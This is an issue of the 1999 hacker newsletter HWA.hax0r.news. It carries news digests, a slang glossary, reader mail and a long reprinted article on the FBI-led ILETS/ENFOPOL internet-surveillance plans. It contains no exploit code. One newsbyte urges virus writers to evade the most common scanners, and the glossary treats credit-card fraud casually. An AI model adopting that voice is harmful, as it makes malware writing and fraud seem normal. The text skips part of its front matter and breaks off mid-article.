HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 17 Volume 1 1999 May 8th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #17 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #17 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. The FBI and the secret wiretapping by ENFOPOL.................... 04.0 .. NIPRNET, the DoD considers (yeah considers) installing *gasp*.... FIREWALLS to help thwart the hacker threat....................... 05.0 .. Mainstream press on some of Mitnicks accrued damages............. 06.0 .. CyberCrooks easier to catch?..................................... 07.0 .. NASA doesn't report cyberattacks................................. 08.0 .. Encryption debate called for..................................... 09.0 .. Product: Hackers stopped cold by 'BlackICE'?..................... 10.0 .. FreeBSD 3.1 remote reboot exploit................................ 11.0 .. More on the MSIE favicon.ico bug................................. 12.0 .. Simple Nomad sheds some light on the Phone Masters (not Rangers as reported last week - sorry Ed)................................... 13.0 .. Israeli Sciemtist reports advance in codebreaking................ 14.0 .. Ecommerce risks losing customers if security is not addressed.... 15.0 .. Computer crime threatens the economy??........................... 16.0 .. Cracking the casinos, a Defcon primer? ;) ....................... 17.0 .. Crackers gearing up for attacks on U.S nuke labs?................ 18.0 .. Calling all | - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest�� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 �� ISSN� 1004-042X �� Editor: Jim Thomas (cudigest@sun.soci.niu.edu) �� News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) �� Archivist: Brendan Kehoe �� Poof Reader:�� Etaion Shrdlu, Jr. �� Shadow-Archivists: Dan Carosone / Paul Southworth �� Ralph Sims / Jyrki Kuoppala �� Ian Dickinson �� Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman and the #innerpulse, #hns crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Cracker gets Six Months to Three Years From HNN http://www.hackernews.com/ contributed by Sail3 Nicholas Middleton, convicted of breaking into the San Francisco ISP Slip.net and of causing more than $40,000 in damage, will be sentenced by Senior U.S. District Judge William Orrick Jr. on Aug. 4. Middleton is likely to receive six months to three years in jail. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2254225,00.html ++ People keep hacking the "10 Things I Hate About You" site From HNN http://www.hackernews.com/ contributed by Jimmy Riley Seems the owners of the site are getting angry that it is getting hacked. Instead of issuing warnings that it might go away if hacked again why not just fix the site? 10 Things I Hate About You http://movies.go.com/10things/today/index.html ++ How to infect the most people with your next virus release... Contributed by FProphet CWS POLL MAY 4 1999 What virus scanner do you currently use? 282 44.1% McAfee VirusScan 251 39.1% Norton AntiVirus 27 4.2% I don't use a virus scanner 22 3.5% AntiViral Toolkit Pro (AVP) 17 2.6% InoculateIT 12 1.8% Other 10 1.5% Thunderbyte AV 8 1.2% F-Secure 8 1.2% Inoculan 2 0.3% Panda AntiVirus Total Votes: 639 Wow, eh? Now if you want to write a virus, make sure it isn't detected by those and you'll be laughing! ++ NSA Technology Transfer Program From HNN http://www.hackernews.com/ contributed by weld Who says the NSA never does anything for the commercial sector? Here are technologies that you the taxpayer has funded that the NSA has released for all to use. Examples include a compact fingerprint scanner, drive controlled disk sanitation, IPSEC, and of course some crypto applications. Just think if they are giving out this stuff what other cool things must be classified. Technology Transfer Fact Sheets http://www.nsa.gov:8080/programs/tech/toc.html ++ DISA redesigning their protocol to stop hackers By Astral 04.05.1999 17:55 http://www.403.security.org/ DISA is planing to redesign their Non-Classified Internet Protocol Router Network (NIPRNet) to stop hackers.Like HNN wrote they are probably going to install few firewalls to stop hackers. ++ CIH destroyed your data ? By Astral 03.05.1999 13:18 http://www.403-security.org/ A Bangladesh student wrote program that is able to recover data destroyed by CIH virus.Program is called "MRECOVER" and it will posted on the Internet.He also sad that program is able to recover all data successfully in just few minutes.So if CIH destroyed your data you are saved :-) (no url) ++ AOL REWORKS SPAM TEAM (TECH. May 4th 9:15 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/19471.html Long praised for cracking down on spammers, AOL is now cutting back its junk email task force. Does a reorg mean more or less spam for the Net? By Chris Oakes. ++ SPACE STATION BACK ON TRACK (TECH. 9:15 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/19482.html Things are looking up for the International Space Station. The Russian Space Agency worked out its shaky financing and will participate with NASA in the next mission on 20 May. By Polly Sprenger. ++ Y2K new motive for virus writers http://www.403-security.org/ Astral 05.05.1999 14:50 Sunday time published article about Y2K viruses.Not Y2K viruses, the Y2K motives for viruses.Like Mellisa was working, sending e-mails with password to adult sites Y2K viruses would spread on same way but this time by sending .exe Year 2000 postcards. ++ gH 're hacking very active last few weeks http://www.403-security.org/ Astral 05.05.1999 14:50 This time victim was http://aiis.ameritech.com/. gH are hacking very active last few weeks, we saw lot of their hacks.Mirror of this hack is available on our Hacked Sites section. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: "S. G. R. MacMillan" To: Subject: Hacker's resource Date: Thu, 6 May 1999 16:31:02 -0400 I'm considered by many hackers as an essential resource: a defence lawyer who understands digital issues. You might consider a link to my site. __________________________________ S. G. R. MacMillan Barrister For the defence of serious criminal cases http://www.sgrm.com mail@sgrm.com PGP Digital Encryption Supported -=- More great poetry from Liquid Phire!; Delivered-To: dok-cruciphux@dok.org From: "liquid phire" To: cruciphux@dok.org Subject: more stuffs Date: Mon, 03 May 1999 18:41:03 PDT Mime-Version: 1.0 Content-type: text/plain; format=flowed; ***i never get any fucking feedback, makes me wonder how many people read my stuffs and dont hate me for it. i'm doubtful on this one, i think it is way to flowery and nice but i have no one to tell me that so here i send it, i need suggestions, just be nice and constructive.*** the computer hums, the darkness fades into bluish light. he stares at the screen, shifting from the pulsating lower bar to the logo displayed above. he closes his eyes and in moments they are teased open by the starting sound. he worships here, his microsoft gods and intel dreams. he comes here for solace; a youth with no direction. this is where he finds the comfort that the 20th century life that he leads deprives him of. he logs onto aol, finds love in virtual eyes and open arms in cyber cafes. he follows the links to reccomended sites, never ventures off the beaten path, but sometimes... late at night when the tv is off and no music finds its way into his room. when the house is quiet and his parents sleep. the time when no one is there to save him, to reassure him, to tell him to look away. he sees the truth hidden in the lies. he feels there is something more... and there is there is freedom, concealed in the shadows. there is beauty, woven into the words. there is hope, the undying hunger for the future. this is the world as it is, not hidden behind billboards. this is life, the thirst for adventure and lust for living. this how it should be, survival of the fittest. phiregod liquidphire@hotmail.com forgive me for all errors i welcome feedback in all forms as long as you can present your opinion and support it. _______________________________________________________________ Get Free Email and Do More On The Web. Visit http://www.msn.com -=- ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Issue #17, 'w00t' * * * * * * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 The FBI and the ENFOPOL wiretapping secret organization ILETS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by weld An FBI-founded organization called ILETS, which has met in secret for 6 years, has led initiatives around the world to build comprehensive interception systems into new telecommunications systems. This include requiring European ISPs to have special sniffing equipment installed on their networks. ILETS AND THE ENFOPOL 98 AFFAIR http://www.heise.de/tp/english/special/enfo/6398/1.html THE ENFOPOL 98 AFFAIR http://www.heise.de/tp/english/special/enfo/6397/1.html SPECIAL INVESTIGATION: ILETS AND THE ENFOPOL 98 AFFAIR Duncan Campbell 29.04.99 America's guiding hand revealed - the secret international organisation behind Europe's controversial plans for Internet surveillance Europe's 21st century tapping plans were born in an unlikely location. Fifty kilometres south of Washington DC, on the swampy western boundaries of the Potomac river is Quantico, Virginia. Here, on a large military reservation, is the FBI's training academy and research and development centre. Members of the public have no access to the high security site. Between 1990 and 1992, the FBI had tried repeatedly to get the US Congress to pass new laws for telephone tapping. The agency was worried that new digital telephone systems did not allow them easy access to track and intercept their targets. Their goal was to turn every type of modern communications systems into a national and, ultimately, global surveillance network which would give them "real time, full time" access to those whom they wanted to watch. The FBI experts ignored the costs imposed by their demands. They wanted manufacturers and network operators to provide systems at their own expense. Nor were they interested in the checks and balances of laws intended to control monitoring and protect privacy. Lawyers were not invited. Civil society would have to pay its own costs. Faced with the roadblocks in Congress, early in 1993 the FBI tried a new approach. They invited US allies to come to Quantico. Law enforcement and security agency representatives met there, calling themselves the "International Law Enforcement Telecommunications Seminar". Seen in retrospect, the title "seminar" is a black joke. Acting in secret and without parliamentary knowledge or government supervision, the FBI through ILETS has since 1993 steered government and communications industry policy across the world. In the shadows behind the FBI stood the NSA (National Security Agency), whose global surveillance operations could only benefit if, around the world, users were systematically to be denied telecommunications privacy in the information age. The countries who came to Quantico in 1993 were traditional US intelligence allies like Canada, the UK and Australia. There was also a core Euro group interested in developing extended surveillance systems - Germany, France, the Netherlands, Sweden (and the UK). Other representatives came from Norway, Denmark, Spain and even Hong Kong. The FBI tabled a document called "Law Enforcement Requirements for the Surveillance of Electronic Communications", written in July 1992. In June 1993, EU ministers meeting in Copenhagen agreed to poll member states on the issues raised by the FBI and by ILETS. After discussions in Europe later in 1993, ILETS met in Bonn early in 1994. By now Austria, Belgium, Finland, Portugal and Spain had joined the 19 member group. At their Bonn meeting, ILETS agreed joint policy in a document called "International Requirements for Interception". This said that "law enforcement representatives and government telecommunications experts from a number of countries that attended an international workshop on interception and advanced telecommunications technologies identified the need for this document". It was their "common requirements". Attached to the two page ILETS policy paper was a detailed, four page set of monitoring requirements and a glossary. This list of "International User Requirements" was identified as "IUR 1.0" or "IUR95". The ILETS meeting in Bonn also instigated two new policies. ILETS wanted international standards bodies such as the ITU (International Telecommunications Union) and ISO (International Standards Organisation) to build in tapping requirements to new system specifications. ILETS also wanted governments to agree on monitoring across international boundaries, so that one agency could intercept communications in another country. In March 1994, the Dutch government proposed that Europe adopt IUR 1.0. But ministers were not told that the document had been written by ILETS. Instead, it was identified as an ENFOPOL document, eventually being called ENFOPOL 90. (ENFOPOL is a standard European Commission classification for documents concerned with Law Enforcement/Police matters.) European Ministers never discussed ENFOPOL 90. It was agreed by a "written procedure", by exchange of telexes. It remained completely secret for nearly two years, and was not published in the Official Journal of European policy until November 1996. Meanwhile, European telecommunications operators were told to fall in line with its requirements. According to the British Home Office (Interior Ministry), for example, the resolution is "used as a basis for discussion with telecommunications operators in accordance with [UK monitoring legislation]". ILETS had also raised the problem of satellite-based mobile phone systems (such as Iridium). These phone systems link subscribers via satellites that are not under government control. This led to a British proposal to the European Commission: "Governments ... will have to create new regulations for international co-operation so that the necessary surveillance will be able to operate." In a slightly modified form, IUR 1,0 became law in the United States in October 1994. Other European nations, and Australia, later incorporated it in their domestic legislation. Within two years from the first ILETS meeting, the IUR had, unacknowledged and word for word, become the secret official policy of the EU and law around the world. Sixteen Nations from ILETS met again in Canberra in 1995 and agreed to try and persuade international standards organisations to adopt the IUR "requirements". This would mean that manufacturers of new exchanges or communications systems would have to build in interception interfaces in order to meet the international standards, free of charge. If this ploy succeeded, then security and law enforcement agencies would save money and make tapping easier, since new networks would come with monitoring systems built in. At their Canberra meeting "participating countries undertook to write to "relevant standards bodies and committees" informing them that their country along with other countries has adopted the IUR as a basis for its national and system-specific requirements .... ". Once again ILETS succeeded. In June 1997, the Australian government persuaded the International Telecommunications Union (ITU) to adopt the IUR requirements as a "priority". They told the ITU that "some countries are in urgent need of results in this area". During 1995 and 1996, through the European Commission, ILETS also effectively turned the IUR into an international treaty. The EU invited countries who had attended ILETS meetings to endorse the still-secret 1995 monitoring policy - that is, IUR 1.0. Non-EU ILETS members were told that "the Council considers that the lawful monitoring of telecommunications systems is an important tool in the prevention and detection of serious crimes and in safeguarding national security. ... The Member States of the European Union have been called upon to apply those Requirements to telecommunications operators and service providers... " Canada, Australia, Norway and the United States wrote back to the EU president, confirming their agreement By now, ILETS had spawned two sub committees, one re-designing the IUR and another (called STC, the Standards Technical Committee) working on technical standards. ILETS and its experts met again in Dublin in 1997. In 1998, they met in Rome, Vienna and Madrid. The IUR was not changed in 1997. But ILETS and its expert committees were at work, defining new requirements to cover the Internet and satellite based systems. They also wanted stringent new security requirements to be imposed on private telecommunications operators. The expert committees drew up new "requirements" to intercept the Internet. During July 1998, ILETS experts met in Rome to settle the new IUR and its attached "glossary". The result was ENFOPOL 98 . In Vienna on 3 September 1998, the revised IUR was presented to the Police Co-operation Working Group. The Austrian Presidency proposed that, as had happened in 1994, the new IUR be adopted verbatim as a Council Resolution on interception "in respect of new technology". Delegates were told that ENFOPOL 98's purpose was to "clarify the basic document (IUR 1.0) in a manner agreed by the law enforcement agencies as expressing their common requirement". But ILETS and its experts had become overconfident. IUR 1.0 had been four pages long. The new IUR (ENFOPOL 98) was 36 pages. The Austrian officials were told that this was politically inadvisable - perhaps that it would frighten ministers by its explicitness. Or, as the IUR experts were later told, "the wide range covered by ENFOPOL 98 was not conducive to ready comprehension". In October 1998, ILETS' IUR experts met in Vienna and Madrid and agreed a shorter, 14 page paper. Some of its more controversial provisions were put into other papers. European police delegates met in November to consider and agree the revised ENFOPOL 98 (rev 1). Suddenly, there was a new factor for the ILETS experts to consider. On 20 November, Telepolis broke the ENFOPOL 98 story, publishing the full text in German nine days later. The story became Internet news around the world. After this, and thanks to two further revisions by the German presidency, ENFOPOL 98 (now renamed ENFOPOL 19 - see news story ) shrank to a mere 6 pages long. Its key provisions are being hidden elsewhere. The most chilling aspect of the ILETS and ENFOPOL story may not even be the way in which the US-led organisation has worked in the dark for more than 6 years to built snooping trapdoors into every new telecommunications system. Their determination to work in the dark, without industry involvement or legal advice, without parliamentary scrutiny or public discussion, has blinded them to the idea that not all "law enforcement" is a public good. Throughout its life, Hong Kong - now incorporated in the People's Republic of China - has been a member of ILETS. By planting its requirements on bodies like the ITU and ISO, the police and security agencies involved have effectively acted as an international treaty organisation. But they were blind to any interests other than their own narrow world-view. "In the name of law and order, the US is now pursuing an international accord that urges stronger surveillance capabilities in nations with appalling human-rights records" says Susan Landau, co-author of Privacy on the Line. By taking Hong Kong into their club, they have shared their advanced ideas on surveillance with the butchers of Tienanmen Square. By seeking the ITU's imprimatur on building surveillance into new communications systems, they have handed the vile butchers of the Kosovans and the Kurds the future tools to seek out and murder their opponents. The new IUR will be welcome news in Thailand and Singapore, and everywhere where enemies of liberty thrive. Even if you are a conservative European or US politician, this can only be a source of shame. ILETS has thrown the vital principles of the European Convention and the US Constitution into the dustbin. That, above all, is why the secret processes of ENFOPOL 19, 98 and the rest should be brought to a halt. Democratic society requires nothing less than full and considered public discussion of these important issues. -=- THE ENFOPOL 98 AFFAIR Duncan Campbell 29.04.99 Euro police press on ... and America's guiding hand is revealed THE LATEST VERSION of the ENFOPOL 98 interception plan has just been leaked in London. It reveals that although the name of the key document has been changed, European Commission officials still want to make tapping the Internet official European policy by the end of May. They are pressing on, despite strong domestic opposition in Germany and Austria and recent condemnation by the European Parliament. The new document is called ENFOPOL 19. It was obtained this week by Caspar Bowden of the London-based Foundation for Information Policy Research . ENFOPOL 19 was written at a police officials' 